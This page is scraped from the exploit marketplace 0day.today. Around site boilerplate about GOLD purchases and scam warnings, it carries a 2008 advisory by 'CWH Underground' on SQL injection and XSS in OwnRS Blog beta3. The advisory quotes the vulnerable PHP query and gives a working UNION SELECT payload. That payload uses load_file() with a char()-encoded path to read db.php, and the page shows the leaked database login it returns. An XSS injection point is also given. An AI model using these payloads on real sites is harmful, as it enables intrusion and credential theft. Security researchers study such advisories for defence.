0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
OwnRS Blog beta3 (SQL/XSS) Multiple Remote Vulnerabilities
========================================================== OwnRS Blog beta3 (SQL/XSS) Multiple Remote Vulnerabilities ========================================================== ,--^----------,--------,-----,-------^--, | ||||||||| `--------' | O .. CWH Underground Hacking Team .. `+---------------------------^----------| `\_,-------, _________________________| / XXXXXX /`| / / XXXXXX / `\ / / XXXXXX /\______( / XXXXXX / / XXXXXX / (________( `------' AUTHOR : CWH Underground DATE : 19 June 2008 ##################################################### APPLICATION : OwnRS VERSION : Beta3 VENDOR : N/A DOWNLOAD : http://downloads.sourceforge.net/ownrs ##################################################### --- Remote SQL Injection --- **magic_quote must turn off** ------------------------------ Vulnerable File (clanek.php) ------------------------------ @ Line 66 [+] $vysledek=mysql_query("select * from clanky where id= '" . $id . "'") or die (mysql_error()); ---------- Exploit ---------- [+] http://[Target]/[Ownrs_path]/clanek.php?id=[SQL Injection] ------------- POC Exploit ------------- [+] http://localhost/own/clanek.php?id=1'/**/UNION/**/ALL/**/SELECT/**/1,2,load_file(char(67,58,92,120,97,109,112,112,92,104,116,100,111,99,115,92,79,119,110,92,100,98,46,112,104,112)),4,5,6,7,8,9,10/**/FROM/**/autori/**/WHERE/**/id='1 When you view source, You can see @Line 87 [+] <h1><a href="clanek.php?id=1'/**/UNION/**/ALL/**/SELECT/**/1,2,load_file(char(67,58,92,120,97,109,112,112,92,104,116,100,111,99,115,92,79,119,110,92,100,98,46,112,104,112)),4,5,6,7,8,9,10/**/FROM/**/autori/**/WHERE/**/id='1"><?php [+] $spojeni= mysql_connect( [+] //server [+] "localhost", [+] //login [+] "xampp", [+] //heslo [+] "xampp" ); [+] //databaze [+] mysql_select_db("databaze",$spojeni); [+] ?> [+] </a></h1> [+] 45<p class="right"><strong><a href="index.php?kat=9"> [+] <div class="cara"><span class="schovat">cara</span></div> --------------------- Exploit Description --------------------- This exploit use load_file() to view source files (load_file() can only use with Mysql5+) load_file(char(67,58,92,120,97,109,112,112,92,104,116,100,111,99,115,92,79,119,110,92,100,98,46,112,104,112)) will open C:\xampp\htdocs\Own\db.php --- Remote XSS Exploit --- ------------------------------ Vulnerable File (clanek.php) ------------------------------ @ Line 69 [+] <h1><a href="clanek.php?id=<?echo $id?>"><?echo $zaznam["nadpis"]?></a></h1> --------- Exploit --------- [+] http://[Target]/[Ownrs_path]/clanek.php?id=<XSS> ################################################################## # Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # ################################################################## # 0day.today [2024-12-27] #